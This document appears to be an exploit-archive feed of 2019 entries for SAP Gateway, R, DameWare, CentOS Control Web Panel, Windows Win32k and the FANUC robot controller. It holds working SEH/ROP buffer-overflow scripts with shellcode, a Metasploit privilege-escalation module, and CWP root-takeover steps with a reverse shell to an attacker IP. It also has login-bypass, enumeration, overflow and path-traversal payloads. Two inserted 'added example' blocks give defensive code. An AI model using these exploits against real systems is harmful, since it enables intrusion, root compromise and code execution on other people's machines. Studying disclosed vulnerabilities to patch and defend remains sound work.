Channel: Exploit Collector

SAPUI5 1.0.0 / SAP Gateway 7.5 / 7.51 / 7.52 / 7.53 Content Spoofing


SAPUI5 version 1.0.0 and the SAP Gateway versions 7.5, 7.51, 7.52 and 7.53 are vulnerable to content spoofing in multiple parameters.


MD5 | 039a38b4ad196a156e5de1ace8468804

[Description]
SAPUI5 1.0.0 and the SAP Gateway versions 7.5, 7.51, 7.52 and 7.53 are
vulnerable to Content Spoofing in multiple parameters.

------------------------------------------
CVE
CVE-2019-0319

------------------------------------------

[Impact]
An attacker could thus mislead a user to believe this information is from
the legitimate service when it's not.

------------------------------------------

[VulnerabilityType Other]
Content Spoofing

------------------------------------------

[Vendor of Product]
SAP

------------------------------------------

[Affected Product]
SAPUI5 1.0.0 and the SAP Gateway versions 7.5, 7.51, 7.52 and 7.53

------------------------------------------

[PoC]
Tested in SAPUI5 1.0.0
PoC:

https://sapmobile.target.com/sap/opu/odata/UI2/INTEROP/PersContainers(category='P',id='flp.settings.FlpSettings')?$expand=PersContainerItemsu1kpa_HACKED_&sap-cache-id=D49C673A8D0D275477C7CD1FBFA3EE31

------------------------------------------

[Attack Type]
Remote

------------------------------------------

[Reference]
https://capec.mitre.org/data/definitions/148.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0319
------------------------------------------

[Discoverer]
Offensive0Labs - Rafael Fontes Souza




References below:
"SAP Product Security Response Team
Mon, Jul 8, 04:33 (6 days ago)
to me, SAP

Hello Rafael,

We are pleased to inform you that we are releasing the following security
note on July Patch Day 2019:

Sec Incident ID(s) 1870475251

Security Note 2752614

Security Note Title [CVE-2019-0319] Content Injection Vulnerability in SAP
Gateway

Advisory Plan Date 10/09/2019

Delivery date of fix/Patch Day 07/09/2019

CVSS Base Score 4.3

CVSS Base Vector NLNR | U | NLN

Credits go to:

Offensive0Labs, Rafael Fontes Souza

*Notes will be visible to customers on 9th of July 2019.

https://wiki.scn.sap.com/wiki/display/PSR/Acknowledgments+to+Security+Researchers

"


R 3.4.4 (Windows 10 x64) Buffer Overflow


R version 3.4.4 (Windows 10 x64) SEH buffer overflow exploit with DEP/ASLR bypass.


MD5 | b5210f82925cd36b43862813470c3a0f

#!/usr/bin/python
# Exploit Title: R 3.4.4 (Windows 10 x64) - Buffer Overflow SEH(DEP/ASLR Bypass)
# Date: 2019-07-15
# Exploit Author: blackleitus
# Vendor Homepage: https://www.r-project.org/
# Tested on: Windows 10 Home Single Language 64-bit
# Social: https://twitter.com/blackleitus
# Website: https://skybulk.github.io/
# discovered by: bzyo


# GUI Preferences -> paste payload.txt into 'Language for menus ...' -> click OK
import struct

outfile = 'payload.txt'

def create_rop_chain():
    rop_gadgets = [
        0x6c998f58, # POP EAX # RETN [R.dll]
        0x6379973c, # ptr to &VirtualProtect() [IAT methods.dll]
        0x6fee2984, # MOV EAX,DWORD PTR DS:[EAX] # RETN [grDevices.dll]
        0x6ca1ba76, # XCHG EAX,ESI # RETN [R.dll]
        0x64c45cb8, # POP ECX # RETN ** [methods.dll] ** | {PAGE_EXECUTE_READ}
        0x64c46010, # &Writable location [methods.dll]
        0x6cacc7e2, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0xffffffc0, # Value to negate, will become 0x00000040
        0x7139c7ba, # NEG EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
        0x6ca3485a, # XCHG EAX,EDX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0x7135a862, # POP EAX # RETN ** [stats.dll] ** | {PAGE_EXECUTE_READ}
        0xfffffdff, # Value to negate, will become 0x00000201
        0x6e7d41ca, # NEG EAX # RETN ** [utils.dll] ** | {PAGE_EXECUTE_READ}
        0x63742597, # XCHG EAX,EBX # RETN ** [Rgraphapp.dll] ** | {PAGE_EXECUTE_READ}
        0x6cbef3c0, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0x41414141, # Filler (compensate)
        0x6c9b1de7, # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0x6ca2a9bd, # & jmp esp [R.dll]
        0x6cbebfa6, # POP EAX # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}
        0x90909090, # nop
        0x6ca00e93, # POP EDI # RETN [R.dll]
        0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll]
        0x6ff1b7bb, # PUSHAD # RETN [grDevices.dll]
    ]

    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()

junk = "A" * 1016

seh = struct.pack("<L", 0x6cb5f812) # 0x6cb5f812 : {pivot 2988 / 0xbac} : # ADD ESP,0B9C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [R.dll] ** | {PAGE_EXECUTE_READ}

# msfvenom -a x86 -p windows/exec -e x86/shikata_ga_nai -b '\x00\x09\x0a\x0d' cmd=calc.exe exitfunc=thread -f python

nops = struct.pack("<L", 0x6cacc7e3) * 30

shellcode = ""
shellcode += "\x90" * 20

padding = "D" * (8000-1016-4-30-len(rop_chain)-len(shellcode))

payload = junk + seh + nops + rop_chain + shellcode + padding

with open(outfile, 'w') as file:
    file.write(payload)
print "payload File Created\n"

DameWare Remote Support 12.0.0.509 Buffer Overflow


DameWare Remote Support version 12.0.0.509 Host SEH buffer overflow exploit.


MD5 | a51904aa9c36feff235373043d90d66a

#!/usr/bin/env python
# Author: Xavi Beltran
# Date: 11/07/2019
# Description:
# SEH based Buffer Overflow
# DameWare Remote Support V. 12.0.0.509
# CVE-2018-12897

# Contact: xavibeltran@protonmail.com
# Webpage: https://xavibel.com
# Tested on: Windows XP SP3 ESP

# Credit for Adam Jeffreys from Nettitude! :)

# Usage:
# Right click on a host >> AMT >> AMT Settings dialog
# Mark "Use SOCKS proxy" box
# Paste the string in the Host field

junk = "\x41" * 1672

# Unicode compatible padding
nseh = "\x61\x43"

# 007A007B - POP POP RET
seh = "\x7B\x7A"

align = ""
align += "\x05\x20\x11" # add eax,0x11002000
align += "\x71" # Venetian Padding
align += "\x2d\x19\x11" # sub eax,0x11001900
align += "\x71" # Venetian Padding
align += "\x50" # push eax
align += "\x71" # Venetian Padding
align += "\xC3" # RETN

padding = "\x41" * 11

junk2 = "\x41" * 870
junk3 = "\x41" * 2014

# msfvenom -p windows/exec CMD=calc -f raw > shellcode.raw
# ./alpha2 eax --unicode --uppercase < shellcode.raw
# 508 bytes
shellcode = "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLYX4BM0M0KPQP4IZEP17PQTDKPPNPTK1BLLDK1BLTTKT2MXLOVWPJMV01KO6LOLS13LM2NLMPWQHOLMM1WWK2KBPR27TKPRLP4K0JOLTK0LN1D8K3OXKQJ1R1TKPYMPM1HS4KPILXYSOJQ9DKOD4KM1XVNQKO6LGQ8OLMM1WWP89PRUZVLCSMKHOKSMMT2UJD1HDKQHNDKQJ31VTKLL0K4K1HMLM1J3DKKTTKM1HP3YQ4O4ND1K1KQQR9PZ0QKOYPQOQOQJDKLRZKTM1MRJM1DMCUH2KPKPKPPPQXP1TKBOU7KOHUWKL07EFB0V38W6V5WMUMKOJ5OLM63LLJ3PKKIP2UKUWK17MCBRROQZM0B3KOZ51S1Q2LQSKPA"


crash = junk + nseh + seh + padding + align + junk2 + shellcode + junk3

print(crash)

CentOS Control Web Panel 0.9.8.836 Privilege Escalation


CentOS Control Web Panel version 0.9.8.836 suffers from a privilege escalation vulnerability.


MD5 | a9210bf1e43adfc4a34316bfb77c32ed

//====================================================================\\
|| ||
|| CWP Control Web Panel 0.9.8.836 - 0.9.8.839 ||
|| Root Privilege Escalation ||
|| ||
\\====================================================================//

# ====================================================================
# Information
# ====================================================================
# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.40 Root Privilege Escalation
# Date: 6 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: http://centos-webpanel.com/cwp-el7-latest (Have to change version in the script)
# Version: 0.9.8.836 to 0.9.8.839
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13359

Product : CWP Control Web Panel
Vulnerability Name : Root Privilege Escalation
version : 0.9.8.836
Fixed on : 0.9.8.840
Tested on : CentOS 7.6.1810 (Core)
Reference : http://centos-webpanel.com/
: https://control-webpanel.com/changelog
CVE-Number : CVE-2019-13359


# ====================================================================
# Root cause of the vulnerability
# ====================================================================
1. The session files are stored in the /tmp directory
2. The rkey value in the session file does not change when accessed from the same source IP address



# ====================================================================
# Steps to Reproduce
# ====================================================================

Session preparation stage
1. Check the current IP address of attacker
2. Set the IP address on testing environment network
3. Login as root on port 2031/2087 and save the cookie name from web browser (cwsrp-xxxxxxxxxxxxxxxxxxxxx)
4. Copy the content of session file (/tmp/sess_xxxxxxxxxxxxxx) to a new file "sess_123456" # we need "rkey"
5. Save the token value from the session file (cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx)

* rkey is created from the client IP, so do not change the client IP when attacking the real target

Attack stage

#
# Method 1 Uploading via reverse shell
#

1. Go to crontab and set "bash -i >& /dev/tcp/[Attacker-IP]/8000 0>&1"
2. Create session file through reverse shell

echo "username|s:4:\"root\";logged|b:1;rkey|s:20:\"[RKEY]\";token|s:36:\"[TOKEN-KEY]\";"> /tmp/sess_123456

3. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
4. Change file permission "chmod 664 /tmp/sess_123456"
5. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
6. Open the URL and become the root user


#
# Method 2 Uploading via File manager function
#

1. On the real target, login as a normal user on port 2083 and upload file "sess_123456" to /tmp directory and set permission to 644 (chmod 664 /tmp/sess_123456) via crontab feature
2. On another browser, replace the token value in the URL https://[target.com]:2031/cwp_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/admin/index.php
3. Create cookie name "cwsrp-xxxxxxxxxxxxxxxxxxxxx" and set its value to "123456" (sess_123456)
4. Open the URL and become the root user

*Steps 1 - 4 need to be done quickly. If they are done too slowly, the application will change the permission of file sess_123456 to 600 and the file will become 0 bytes. If this happens, the attacker needs to change the session file name and repeat the steps



# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13359.md



# ====================================================================
# Timeline
# ====================================================================
2019-06-30: Discovered the bug
2019-06-30: Reported to vendor
2019-06-30: Vendor accepted the vulnerability
2019-07-02: The vulnerability has been fixed
2019-07-06: Published



# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak

CentOS Control Web Panel 0.9.8.836 Authentication Bypass


CentOS Control Web Panel version 0.9.8.836 suffers from an authentication bypass vulnerability.


MD5 | 010e4c768075759ac870b22afd37ce05

# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.847 Bypass Login
# Date: 6 July 2019
# Exploit Author: Pongtorn Angsuchotmetee
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: Not available, user panel only available for latest version
# Version: 0.9.8.836 to 0.9.8.846
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13360, CVE-2019-13605

# ====================================================================
# Information
# ====================================================================

Product : CWP Control Web Panel
Vulnerability Name : User panel bypass Login
version : 0.9.8.836
Fixed on : 0.9.8.848
Tested on : CentOS 7.6.1810 (Core)
Reference : http://centos-webpanel.com/
: https://control-webpanel.com/changelog
CVE-Number : CVE-2019-13605


# ====================================================================
# Root cause of the vulnerability
# ====================================================================
After a successful login, the application returns a base64 value and uses it to authenticate again.
This allows an attacker to modify the response and become a user.

# ====================================================================
# Response format (version 0.9.8.836 to 0.9.8.837)
# ====================================================================

<username>||/<username>/theme/original



# CVE-2019-13360
# ====================================================================
# Steps to Reproduce Version 0.9.8.836 to 0.9.8.837
# ====================================================================

1. Login with valid username and invalid password
2. Replace the target username in "<username>||/<username>/theme/original"
3. Convert to base64
4. Place the base64 value to HTTP response body
5. Gain access to user area


# CVE-2019-13605
# ====================================================================
# Steps to Reproduce Version 0.9.8.838 to 0.9.8.846
# ====================================================================

1. Create a testing environment
1.1 Create user as a target username
1.2 Login as the user
1.3 Save the HTTP response body (token value)
2. Login to the real target with valid username and invalid password
3. Place the value we saved from step 1.3 in HTTP response body
4. Gain access to user area

*The response value format depends on the version; just replace the whole value



# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13360.md
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13605.md



# ====================================================================
# Timeline
# ====================================================================
2019-07-07: Discovered the bug
2019-07-07: Reported to vendor
2019-07-07: Vendor accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Advisory published



# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
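
Added example (not part of the advisory and not CWP's code): the root cause above is that a base64 value of the form "<username>||/<username>/theme/original" is trusted when it comes back from the client. The Python sketch below contrasts that unsigned value with an HMAC-signed, expiring token bound to a per-install secret, which also rejects a value captured on a different installation (the CVE-2019-13605 case). The function names, the token layout and the secret are assumptions made for illustration.

```python
import base64
import hashlib
import hmac
import time

# Assumption: a random secret generated per installation and kept server-side.
SECRET = b"constructed-demo-secret"


def legacy_token(username):
    """Format described in the advisory: base64 only, no integrity protection."""
    return base64.b64encode(f"{username}||/{username}/theme/original".encode()).decode()


def legacy_accepts(token):
    """Flawed server side: any well-formed value is believed as-is."""
    user, _, _ = base64.b64decode(token).decode().partition("||")
    return user or None


def issue_token(username, now=None, ttl=60, secret=SECRET):
    """Issue '<b64 payload>.<b64 HMAC-SHA256 tag>' after a successful password check."""
    issued = time.time() if now is None else now
    payload = f"{username}||{int(issued + ttl)}".encode()
    tag = hmac.new(secret, payload, hashlib.sha256).digest()
    return (base64.urlsafe_b64encode(payload).decode() + "."
            + base64.urlsafe_b64encode(tag).decode())


def verify_token(token, now=None, secret=SECRET):
    """Return the username only if the tag verifies and the token has not expired."""
    current = time.time() if now is None else now
    try:
        payload_b64, tag_b64 = token.split(".")
        payload = base64.urlsafe_b64decode(payload_b64)
        tag = base64.urlsafe_b64decode(tag_b64)
    except ValueError:  # wrong shape or invalid base64
        return None
    expected = hmac.new(secret, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # edited payload, or a token minted by another installation
    try:
        username, _, expires = payload.decode().rpartition("||")
        if int(expires) < current:
            return None
    except ValueError:
        return None
    return username or None
```

Signing only hardens the round trip; keeping the authenticated state entirely server-side after the password check removes the round trip altogether.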

CentOS Control Web Panel 0.9.8.838 User Enumeration


CentOS Control Web Panel version 0.9.8.838 suffers from a user enumeration vulnerability.


MD5 | c0097370579f6ba471afee6e2a345e0b

# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message
# Date: 15 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: Not available, user panel only available for latest version
# Version: 0.9.8.836 to 0.9.8.847
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13383

# ====================================================================
# Information
# ====================================================================

Product : CWP Control Web Panel
version : 0.9.8.838
Fixed on : 0.9.8.848
Tested on : CentOS 7.6.1810 (Core)
Reference : https://control-webpanel.com/
CVE-Number : 2019-13383



# ====================================================================
# Root cause of the vulnerability
# ====================================================================
The server responds with a different message for logins with valid and invalid users.
This allows attackers to check whether a username is valid by reading the HTTP response.



# ====================================================================
# Steps to Reproduce
# ====================================================================

1. Log in as a random user with an invalid password

POST /login/index.php?acc=validate HTTP/1.1
Host: 192.168.80.137:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: d41d8cd98f00b204e9800998ecf8427e
X-Requested-With: XMLHttpRequest
Content-Length: 30
Connection: close
Referer: https://192.168.80.137:2083/login/?acc=logon

username=AAA&password=c2Rmc2Rm



2. Check the HTTP response body

2.1 User does not exist (server responds with "suspended")

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:39:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 9

suspended


2.2 User does exist (server responds with an empty body)

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:40:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 0



3. The HTTP response body format depends on the software version, but all versions respond differently for valid and invalid users, as in the example below

--------------------------------------------------
| Username | Password | Result                   |
--------------------------------------------------
| valid    | valid    | login success            |
| valid    | invalid  | {"error":"failed"}       |
| invalid  | invalid  | {"error":"user_invalid"} |
--------------------------------------------------



# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md



# ====================================================================
# Timeline
# ====================================================================
2019-07-06: Discovered the bug
2019-07-06: Reported to vendor
2019-07-06: Vendor accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Published



# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak
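
Added example (not part of the advisory and not CWP's code): a Python sketch of the response table above next to a handler that answers every failed login identically and spends the same hashing work on unknown usernames. The account store, function names and the 401 status are assumptions made for illustration.

```python
import hashlib
import hmac
import os

_ITERATIONS = 50_000  # constructed value for the demo


def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


def _make_record(password):
    salt = os.urandom(16)
    return salt, _hash(password, salt)


# Constructed sample account store: username -> (salt, password hash).
USERS = {"alice": _make_record("correct horse")}

# Dummy record so a lookup miss still performs one full hash computation.
_DUMMY_SALT, _DUMMY_HASH = _make_record("placeholder")


def login_leaky(username, password):
    """Mirrors the advisory's table: the body reveals whether the user exists."""
    record = USERS.get(username)
    if record is None:
        return 200, '{"error":"user_invalid"}'
    salt, stored = record
    if not hmac.compare_digest(_hash(password, salt), stored):
        return 200, '{"error":"failed"}'
    return 200, "login success"


def login_uniform(username, password):
    """Same status and body for every failure, same work for every request."""
    record = USERS.get(username)
    salt, stored = record if record is not None else (_DUMMY_SALT, _DUMMY_HASH)
    password_ok = hmac.compare_digest(_hash(password, salt), stored)
    if record is not None and password_ok:
        return 200, "login success"
    return 401, '{"error":"failed"}'


def is_enumerable(login):
    """Regression check: True if a wrong password gives different responses
    for an existing and a non-existing username."""
    return login("alice", "wrong") != login("no-such-user", "wrong")
```

The `is_enumerable` check is suitable for a test suite, so that a later change to the error messages cannot silently reintroduce the difference.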

Linux PTRACE_TRACEME Broken Permission / Object Lifetime Handling

Microsoft Windows NtUserSetWindowFNID Win32k User Callback


An elevation of privilege vulnerability exists in Microsoft Windows when the Win32k component fails to properly handle objects in memory. This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. This Metasploit module is tested against Windows 10 v1703 x86.


MD5 | 410d26c4ad5d959638a9e5d77947143e

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ManualRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name' => 'Windows NtUserSetWindowFNID Win32k User Callback',
      'Description' => %q{
        An elevation of privilege vulnerability exists in Windows when the Win32k component
        fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability."
        This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows
        Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2,
        Windows 10, Windows 10 Servers.

        This module is tested against Windows 10 v1703 x86.
      },
      'License' => MSF_LICENSE,
      'Author' => [
        'ze0r', # Exploit analysis and PoC
        'Kaspersky Lab', # Vulnerability discovery/detection
        'Jacob Robles' # Metasploit module
      ],
      'Platform' => 'win',
      'Arch' => ARCH_X86,
      'SessionTypes' => [ 'meterpreter' ],
      'DefaultOptions' => {
        'EXITFUNC' => 'thread'
      },
      'Targets' => [
        [ 'Windows 10 v1703 (Build 15063) x86', {
            'UniqueProcessIdOffset' => 180,
            'TokenOffset' => 252,
            'Version' => 'Windows 10 (Build 15063)'
          }
        ]
      ],
      'References' => [
        ['CVE', '2018-8453'],
        ['URL', 'https://github.com/ze0r/cve-2018-8453-exp'],
        ['URL', 'https://mp.weixin.qq.com/s/ogKCo-Jp8vc7otXyu6fTig'],
        ['URL', 'https://mp.weixin.qq.com/s/dcbUeegM0BqErtDufOXfoQ'],
        ['URL', 'https://securelist.com/cve-2018-8453-used-in-targeted-attacks/88151/'],
        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8453']
      ],
      'Notes' => {
        'SideEffects' => [ARTIFACTS_ON_DISK, SCREEN_EFFECTS],
        'Stability' => [CRASH_OS_RESTARTS]
      },
      'DisclosureDate' => '2018-10-09',
      'DefaultTarget' => 0
    ))
  end

  def target_info
    fail_with(Failure::None, 'Session is already elevated') if is_system?

    unless sysinfo['OS'].start_with?(target['Version']) && sysinfo['Architecture'] == 'x86'
      fail_with(Failure::NoTarget, 'Target is not compatible with exploit')
    end
  end

  def write_file_to_target(fname, data)
    tempdir = session.sys.config.getenv('TEMP')
    file_loc = "#{tempdir}\\#{fname}"
    vprint_warning("Attempting to write #{fname} to #{tempdir}")
    write_file(file_loc, data)
    vprint_good("#{fname} written")
    file_loc
  rescue Rex::Post::Meterpreter::RequestError => e
    elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
    fail_with(Failure::Unknown, "Writing #{fname} to disk was unsuccessful")
  end

  def exploit
    target_info
    exe_name = 'CVE-2018-8453.exe'
    exe_path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2018-8453', exe_name)
    vprint_status("Reading payload from file #{exe_path}")
    raw = File.read(exe_path)

    tmp_exe = "#{Rex::Text.rand_text_alphanumeric(10)}.exe"
    vprint_status("Uploading exploit exe as: #{tmp_exe}")
    exe_rpath = write_file_to_target(tmp_exe, raw)
    register_file_for_cleanup(exe_rpath)

    tmp_payload = "#{Rex::Text.rand_text_alpha(6..14)}.exe"
    payload_rpath = write_file_to_target(tmp_payload, generate_payload_exe)
    vprint_status("Uploading payload #{tmp_payload}")
    register_file_for_cleanup(payload_rpath)

    command = "\"#{exe_rpath}\" \"#{payload_rpath}\" #{target['UniqueProcessIdOffset']} #{target['TokenOffset']}"

    vprint_status("Executing command: #{command}")
    session.sys.process.execute(command, nil, {'Hidden' => false})
    print_good('Exploit finished, wait for privileged payload execution to complete.')
  end
end


FANUC Robotics Virtual Robot Controller 8.23 Buffer Overflow


FANUC Robotics Virtual Robot Controller version 8.23 suffers from a stack-based buffer overflow vulnerability.


MD5 | 24accc856caa22d0d70441294d2efb6a



Advisory ID: SYSS-2019-024
Product: FANUC Robotics Virtual Robot Controller
Manufacturer: FANUC Robotics America, Inc.
Affected Version(s): V8.23
Tested Version(s): V8.23
Vulnerability Type: Stack-based Buffer Overflow (CWE-121)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: ?
Public Disclosure: 2019-07-15
CVE Reference: CVE-2019-13585
Author of Advisory: Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

FANUC Robotics Virtual Robot Controller is an application for
programming simulated industry robots.

Due to a stack-based buffer overflow, the remote admin web server
(vrimserve.exe) is vulnerable to denial-of-service and remote code
execution attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

vrimserve.exe offers an HTTP service on TCP port 8090, which can be used
to control virtual robots and view their log files.

A buffer overflow vulnerability was discovered in the log viewer
functionality. By sending a specially crafted HTTP request to the HTTP
server, the application can be crashed causing a denial-of-service
condition.

Remote code execution may also be possible, but was not confirmed
by SySS GmbH. Gaining control over the instruction pointer (EIP) of this
32 bit application by exploiting the stack-based buffer overflow
vulnerability was successful.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

SySS GmbH developed a proof-of-concept exploit that crashes
vrimserve.exe. Note that the exploit gives control over the EIP
register, which is an important prerequisite for remote code execution.

curl "http://${target_host}:8090/namedrobots/folder/dir/<1268 bytes>BBBBCCCCCCCCC"

The bytes denoted as B overwrite the EIP register.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has not yet released a security update.

It is recommended not to make the remote admin web server (vrimserve.exe)
available to untrusted networks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-04-23: Vulnerability discovered
2019-05-22: Vulnerability reported to manufacturer
2019-07-15: Public release of SySS security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Manufacturer website:
https://www.fanucamerica.com/
[2] SySS Security Advisory SYSS-2019-024
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-024.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Sebastian Hamann of SySS GmbH.

E-Mail: sebastian.hamann@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Hamann.asc
Key ID: 0x9CE0E440429D8B96
Key Fingerprint: F643 DF21 62C4 7C53 7DB2 8BA1 9CE0 E440 429D 8B96

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

FANUC Robotics Virtual Robot Controller 8.23 Path Traversal


FANUC Robotics Virtual Robot Controller version 8.23 suffers from a path traversal vulnerability.


MD5 | e58d74e82f6894cd3957246d3cb268c5


Advisory ID: SYSS-2019-025
Product: FANUC Robotics Virtual Robot Controller
Manufacturer: FANUC Robotics America, Inc.
Affected Version(s): V8.23
Tested Version(s): V8.23
Vulnerability Type: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') (CWE-22)
Risk Level: Low
Solution Status: Open
Manufacturer Notification: 2019-05-22
Solution Date: ?
Public Disclosure: 2019-07-15
CVE Reference: CVE-2019-13584
Author of Advisory: Sebastian Hamann, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

FANUC Robotics Virtual Robot Controller is an application for
programming simulated industry robots.

Due to an insufficient validation of user input, the HTTP service of
the application is vulnerable to path traversal attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

vrimserve.exe offers an HTTP service on TCP port 8090, which can be used
to control virtual robots and view their log files.

A path traversal vulnerability was discovered in the log viewer
functionality.

By sending a specially crafted HTTP request to the web server, files and
directories that match the pattern "*.*" can be listed anywhere on the
filesystem. Furthermore, the contents of files named "logfile.txt" can
be read.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The string "..%5C" can be used to access the parent directory.

Therefore, by accessing a URL similar to the following, it is possible
to obtain a list of files (and directories with a . in their name) in
the root directory of the C:\ partition (or another partition, depending
on the software installation).

http://${target_host}:8090/namedrobots/folder/dir/..%5C..%5C..%5C..%5C..%5C..%5C..%5C../

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The vendor has not yet released a security update.

It is recommended not to make the remote admin web server (vrimserve.exe)
available to untrusted networks.

